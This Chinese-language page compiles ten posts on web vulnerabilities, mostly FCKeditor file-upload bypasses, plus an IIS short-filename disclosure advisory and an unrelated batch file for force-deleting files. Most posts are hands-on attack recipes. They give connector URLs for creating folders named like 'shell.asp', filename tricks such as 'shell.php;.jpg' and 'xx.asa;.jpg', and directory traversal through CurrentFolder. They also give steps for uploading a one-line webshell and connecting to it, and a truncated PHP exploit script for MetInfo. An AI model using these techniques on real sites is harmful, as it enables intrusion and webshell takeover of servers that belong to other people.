FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警(集锦10篇)由网友“是未来”投稿提供,小编在这里给大家带来FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警,希望大家喜欢!
篇1:FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警
一些小技巧,有时候还挺有用的,收集下,资料收集于互联网……
FCKeditor 文件上传“.”变“_”下划线的绕过方法:
这是网上公布的:
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试,
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制,
突破建立文件夹:
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
参数:
当前目录名:CurrentFolder=/qing.asp
新的目录名:NewFolderName=x.asp
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
那么 x.asp 就已经建立生成了,此方法百试百灵!
新建文件夹参数 x.asp,基本都能搞定。
篇2:新突破fckeditor漏洞漏洞预警
经测试,此方法通杀asp、aspx版本,不适用于php,
之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录……
今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。
创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了,
以下是误打误撞的方法,不知道黑扩们发了没。
利用过程:
1、Current Folder处填写*.asp等目录文件,随便填即可;点击Create Folder创建目录;目录名随便填。
2、上传jpg格式的一句话木马。
3、利用完毕,直接访问一句话木马地址即可,菜刀链接。
篇3:fckeditor漏洞利用漏洞预警
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
可以自定义文件夹名称上传图片木马,利用路径解析漏洞,也可以直接上传ASP木马,
fckeditor漏洞利用漏洞预警
,
如果是ASPX的就将/asp/connector.asp后缀改为ASPX
Type=Image这个变量是我们自己定义的。比如:
fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp
篇4:FCKEditor FileUpload函数任意文件上传漏洞漏洞预警
漏洞版本:
FCKeditor 2.6.8
漏洞描述:
BUGTRAQ ID: 56735FCKeditor是一款开放源码的HTML文本编辑器,
FCKEditor FileUpload函数任意文件上传漏洞漏洞预警
。FCKEditor 2.6.8及其他版本在'FileUpload()'函数的实现上存在安全漏洞,攻击者可利用此漏洞上传任意文件到受影响计算机,<* 参考Mostafa Azizi*>
安全建议:
厂商补丁:FCKeditor---------目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:www.fckeditor.net/
篇5:WordPress EditorMonkey (FCKeditor)远程文件上传漏洞漏洞预警
EditorMonkey是WordPress中的一款插件,EditorMonkey中的FCKeditor编辑器存在远程文件上传漏洞,可能导致攻击者直接利用该漏洞获取webshell,
[+]info:
~~~~~~~~~
## WordPress EditorMonkey (FCKeditor) Remote File Upload
## Author : kaMtiEz (kamtiez@exploit-id.com)
## Homepage : www.indonesiancoder.com / exploit-id.com / magelangcyber.web.id
## Date : 14 May,
[+]poc:
~~~~~~~~~
[ Vulnerable File ]
127.0.0.1/[kaMtiEz]/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
[ Shell ]
127.0.0.1/[kaMtiEz]/UserFiles/YourFile.txt
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/17284
篇6:IIS短文件和文件夹泄漏漏洞漏洞预警
本文翻译自exploit-db.com,是苦逼阿德马童鞋经过数小时折腾而成,请著名出处,tks.E文太菜,如果有错误之处请各位大大多多指正.
IIS是有微软使用微软windows功能扩展模块创建的一套web服务器应用程序,是世界上第三个最流行的服务器,
漏洞描述:
漏洞研究小组发现了一个微软IIS的漏洞,攻击者可以利用一个包含“~”的get请求,来让服务器上的文件和文件夹被泄漏、
影响版本:
IIS 1.0, Windows NT 3.51
IIS 2.0, Windows NT 4.0
IIS 3.0, Windows NT 4.0 Service Pack 2
IIS 4.0, Windows NT 4.0 Option Pack
IIS 5.0, Windows
IIS 5.1, Windows XP Professional and Windows XP Media Center Edition
IIS 6.0, Windows Server and Windows XP Professional x64 Edition
IIS 7.0, Windows Server and Windows Vista
IIS 7.5, Windows 7 (远程开启了错误或者没有web.config配置文件的情况下)
IIS 7.5, Windows 2008 (经典托管管道模式)
漏洞分析与利用:
如果网站是运行在IIS服务器上,可以通过“~”来发现一些文件和文件夹,攻击者可以发现重要的文件或者文件夹,如果这些文件或者文件夹是正规的可见文件.
关于此漏洞的深入分析可以参考以下连接中的文章:
soroush.secproject.com/blog//06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/
漏洞详细说明:
一直在寻找一种方法,如果我可以使用通配符“*” 和 “?”发送一个请求到iis,我意识到当IIS接收到一个文件路径中包含“~”的请求时,它的反应是不同的.基于这个特点,我们可以根据http的响应区分一个可用或者不可用的文件.在以下的表中,文件validxxx.xxx是存在于网站服务器根目录的.(备注:xxx.xxx是指不确定,还需要继续猜解判断).下图主要是不同版本的IIS返回根据请求的返回错误来判断是否存在某个文件.举例说明如果一个IIS6网站www.xxx.com的短文件猜解方法
请求 www.xxx.com/a*~1*/.aspx返回404,就说明存在a开头的一个axxx.xxx的文件.(其中xxx.xxx还需要进一步确定判断是什么字母,什么后缀).
请求www.xxx.com/a*~1*/.aspx返回400,说明不存在a开头的一个axxx.xxx的文件.(其中xxx.xxx还需要进一步确定判断是什么字母,什么后缀).
IIS5.X的判断方法如下:
请求 /a*~1* 返回404 说明存在a开头的一个文件,
请求/a*~1* 返回400 说明不存在a开头的一个文件.
IIS7.x.net 2 no error handing判断方法如上图,各位仔细看.
下面附上一个IIS6猜解文件的全过程。
测试地址:sdl.me/AcSecret.htmlacsecret.html是存在于服务器上的.猜解过程如下图:
附上详细的poc和漏洞利用说明文件:
PoC: www.exploit-db.com/sploits/19525.zip
Paper: www.exploit-db.com/download_pdf/19527
漏洞修复方案:
使用微软或者安全厂商提供的解决方案
使用配置好的Web应用防护系统(拒绝丢弃掉包含“~”线的Web请求)可能会起到对此漏洞进行防范的作用.
漏洞发现者:
Soroush Dalili (@irsdl)
Ali Abbasnejad
漏洞参考:
support.microsoft.com/kb/142982/en-us
soroush.secproject.com/blog//07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/
漏洞披露相关细节:
2010-08-01 - 发现漏洞
2010-08-03 - 卖方知情
2010-12-01 - 销售商第一反应
2011-01-04 - 第二卖方响应(下一版本修复)
6月29日 - 公开披露
文章未完待续
转自:www.nxadmin.com/web/544.html
篇7:强制删除任意文件以及文件夹漏洞预警
DEL /F /A /Q \\?\%1
RD /S /Q \\?\%1
保存为*.bat
将要删除的文件以及文件夹拖到该批处理上,
强制删除任意文件以及文件夹漏洞预警
,
篇8:FCKeditor漏洞利用总结漏洞预警
Fckeditor漏洞利用总结
查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过,
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
action=“www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=“post”>Upload a new file:
—————————————————————————————————————————————————————————————
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址,
—————————————————————————————————————————————————————————————
8.其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————
10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————
11. FCKeditor 被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为“Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
篇9:MetInfo 3.0 (fckeditor)上传漏洞漏洞预警
MetInfo企业网站管理系统是采用PHP+MYSQL构架的,其中采用了FCKeditor在线编辑器配置不当导致上传被利用,在某些情况下上传1.php.pdf可获取网站shell,
Exploit:
guideshen.blogspot.com- @Guide_Shen -xsstorm.blogspot.com*/ error_reporting(0); set_time_limit(0); ini_set(“default_socket_timeout”, 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print “\n[-] No response from {$host}:80 Trying again...”; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print “\n+------------------------------------------------------------+”; print “\n MetInfo 3.0 File Upload (fckeditor) sh3n ”; print “\n+------------------------------------------------------------+\n”; if ($argc < 2) { print “\nUsage......: php $argv[0] metinfo.pe path”; print “\nExample....: php $argv[0] localhost /fckeditor/\n”; die; } $host = $argv[1]; $path = $argv[2]; $data = “--xSsT0rm\r\n”; $data .= “Content-Disposition: form-data; name=\”NewFile\“; filename=\”sh3n.php.pdf\“\r\n”; $data .= “Content-Type: application/octet-stream\r\n\r\n”; $data .= "
篇10:fckeditor 2.63 0day漏洞漏洞预警
首先,说一下,这个可以说是fckeditor 2.63 oday 。目前知道的人比较多了。
xxxx.com/fckeditor/editor/filemanager/connectors/test.html
hbkingco.com//fckeditor/editor/filemanager/connectors/uploadtest.html 这个两个页面,是死的关键,
上传xx.asa;.jpg
上传之后,路径自然出来了。马为xx.asa; 注意,后面有个;
除了2.63.
Fckeditor 基本上每个版本都可以这么利用。
上传不严格。。
也可以说是IIS G6.0的漏洞。
★ FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警
★ 关于Fckeditor2次上传漏洞(IIS6分号解析漏洞)
【FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警(集锦10篇)】相关文章:
Discuz x1.5盗取任意用户cookie漏洞预警2023-02-07
脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警2023-07-12
Wp暴目录漏洞全版本通杀漏洞预警2022-04-30
网站渗透思路全方面总结2023-01-18
一次意外突破安全狗拿Shell2023-03-26
问题的讨论和解决英语考试要求与试题2023-06-07
心海学校心理管理系统Xday漏洞预警2022-08-24
一个防注入的小白错误千博企业程序漏洞预警2022-09-25
QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警2022-12-20
Podcast Generator多个模块文件包含和任意文件删除漏洞2023-04-14